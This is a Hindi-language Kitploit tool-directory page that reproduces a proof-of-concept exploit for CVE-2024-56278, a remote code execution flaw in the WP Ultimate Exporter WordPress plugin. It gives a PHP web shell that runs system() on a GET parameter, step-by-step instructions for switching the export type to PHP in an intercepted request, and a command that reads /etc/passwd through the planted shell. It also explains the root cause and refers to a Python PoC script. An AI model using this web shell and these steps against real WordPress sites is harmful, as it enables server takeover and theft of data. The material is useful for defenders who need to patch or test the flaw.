Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-56278 — CVE-2024-56278 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WP Ultimate Exporter WordPress प्लगइन में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता, जो PHP वेबशेल में फ़ाइल अपलोड का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/dottak/cve-2024-56278
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेलोड डेवलपमेंट
GitHubdottak/cve-2024-56278

CVE-2024-56278

CVE-2024-56278 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WP Ultimate Exporter WordPress प्लगइन में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता, जो PHP वेबशेल में फ़ाइल अपलोड का प्रदर्शन करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-56278

1️⃣ घटक प्रकार

वर्डप्रेस प्लगइन

2️⃣ घटक विवरण

घटक का नाम WP Ultimate Exporter

संवेदनशील संस्करण <= 2.9.1

घटक स्लग wp-ultimate-exporter

घटक लिंक https://wordpress.org/plugins/wp-ultimate-exporter/

3️⃣ OWASP 2017: TOP 10

भेद्यता वर्ग A4: असुरक्षित डिज़ाइन

भेद्यता प्रकार रिमोट कोड निष्पादन (RCE)

4️⃣ पूर्व-आवश्यकता

व्यवस्थापक

5️⃣ भेद्यता विवरण

👉 संक्षिप्त विवरण

WP Ultimate Exporter प्लगइन WP Ultimate CSV Importer प्लगइन के लिए एक ऐडऑन है। यह प्लगइन आपको सभी पोस्ट, उत्पाद, ऑर्डर, रिफंड और उपयोगकर्ता डेटा को CSV, XLS, XML और JSON प्रारूपों में निर्यात करने की अनुमति देता है। निर्यात करते समय, फ़ाइलें अपलोड पथ में बनाई जाती हैं, और प्लगइन केवल उन फ़ाइलों की सामग्री उपयोगकर्ताओं को वितरित करता है।

WP Ultimate Exporter प्लगइन संस्करण 2.9.1 और उससे नीचे में, डेटा निर्यात का अनुरोध करते समय, यदि अनुरोध डेटा में फ़ाइल एक्सटेंशन PHP पर सेट किया गया है, तो अपलोड पथ में एक PHP फ़ाइल बनाई जाती है। इसलिए, यदि बनाई गई फ़ाइल की सामग्री में PHP सिंटैक्स होता है, तो रिमोट कोड निष्पादन (RCE) भेद्यता उत्पन्न होती है क्योंकि उस फ़ाइल तक पहुँचने पर PHP सिंटैक्स निष्पादित होता है।

👉 पुनरुत्पादन कैसे करें (PoC)

⚠️ चूंकि 'WP Ultimate Exporter' प्लगइन 'WP Ultimate CSV Importer' प्लगइन के लिए एक ऐडऑन है, इसलिए दोनों प्लगइन्स को स्थापित करने की आवश्यकता है।

  1. कोड एडिटर (शॉर्टकट कुंजी: ⇧ ⌥ ⌘ M) का उपयोग करके निम्नलिखित सामग्री के साथ एक नया पोस्ट बनाएं:

    root@kitploit:~
    <pre>
    	<?php
    	    if(isset($_GET['cmd']))
    	    {
    	        system($_GET['cmd']);
    	    }
    	?>
    </pre>
    
  2. WP Ultimate Exporter प्लगइन के 'Export' टैब पर नेविगेट करें। इसे WP Ultimate CSV Importer प्लगइन डैशबोर्ड (/wp-admin/admin.php?page=com.smackcoders.csvimporternew.menu) में 'Export' टैब पर क्लिक करके एक्सेस किया जा सकता है।

  3. अनुरोध पैकेट को इंटरसेप्ट करने के लिए एक प्रॉक्सी टूल (जैसे, BurpSuite) लॉन्च करें, और इंटरसेप्ट सक्षम के साथ निम्नलिखित चरणों के साथ आगे बढ़ें।

  4. इसके बाद, 'Select the module to Export Data' से 'Posts' चुनें और अगले चरण पर आगे बढ़ें।

image

  1. फिर, 'To export data based on the filters' में, निम्नलिखित आइटम सेट करें और 'EXPORT' बटन पर क्लिक करें।
    • Export File Name 'webshell' दर्ज करें
    • Advanced Settings 'CSV' चुनें

image

  1. इस बिंदु पर, डेटा निर्यात करने के लिए /wp-admin/admin-ajax.php URL पर एक POST विधि अनुरोध भेजा जाता है। अनुरोध डेटा में exp_type मान को csv से php में बदलें, फिर Forward पर क्लिक करें।

image

  1. ब्राउज़र एड्रेस बार में /wp-content/uploads/smack_uci_uploads/exports/webshell.php?cmd=cat /etc/passwd दर्ज करें ताकि वर्डप्रेस स्थापित सर्वर पर /etc/passwd फ़ाइल की सामग्री प्रदर्शित हो सके। यह RCE भेद्यता को प्रदर्शित करता है।

image

👉 अतिरिक्त जानकारी (वैकल्पिक)

[भेद्यता का कारण]

WP Ultimate Exporter प्लगइन में डेटा निर्यात करते समय, /wp-content/plugins/wp-ultimate-exporter/exportExtensions/ExportExtension.php फ़ाइल में parseData फ़ंक्शन को कॉल किया जाता है।

इस बिंदु पर, निर्यात डेटा प्रारूप निर्धारित करने वाले अनुरोध डेटा exp_type पर कोई फ़िल्टरिंग नहीं की जाती है, और मान सीधे सदस्य चर $this->exportType में डाला जाता है।

image

इसके बाद, डेटा को फ़ाइल में सहेजने के लिए proceedExport फ़ंक्शन को कॉल किया जाता है। इस बिंदु पर, फ़ाइल संग्रहण पथ निर्दिष्ट करने वाले चर $file को प्रारंभ करते समय, सदस्य चर $this->exportType का भी बिना किसी फ़िल्टरिंग के उपयोग किया जाता है।

image

इसके बाद, चर $file में संग्रहीत फ़ाइल पथ को file_put_contents फ़ंक्शन के तर्क के रूप में पारित किया जाता है, और इस बिंदु पर, फ़ाइल को अनुरोध डेटा exp_type में निर्दिष्ट एक्सटेंशन को सीधे लागू करके सहेजा जाता है।

image

इसलिए, जब वेब शेल कोड वाला पोस्ट डेटा PHP फ़ाइल के रूप में सहेजा जाता है और उस फ़ाइल तक पहुँचा जाता है, तो रिमोट कोड निष्पादन (RCE) भेद्यता उत्पन्न होती है क्योंकि PHP कोड निष्पादित हो जाता है।

image

[PoC कोड कार्यान्वयन और निष्पादन]

  1. PoC कोड को एक एडिटर में खोलें और वर्डप्रेस साइट पता और व्यवस्थापक क्रेडेंशियल दर्ज करें।

image

  1. फिर PoC कोड निष्पादित करने के लिए निम्नलिखित कमांड दर्ज करें।

    आवश्यक मॉड्यूल requests

    root@kitploit:~
    python poc.py
    

    image

6️⃣ शोषण डेमो

video

7️⃣ संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2024-56278
टूल डाउनलोड करें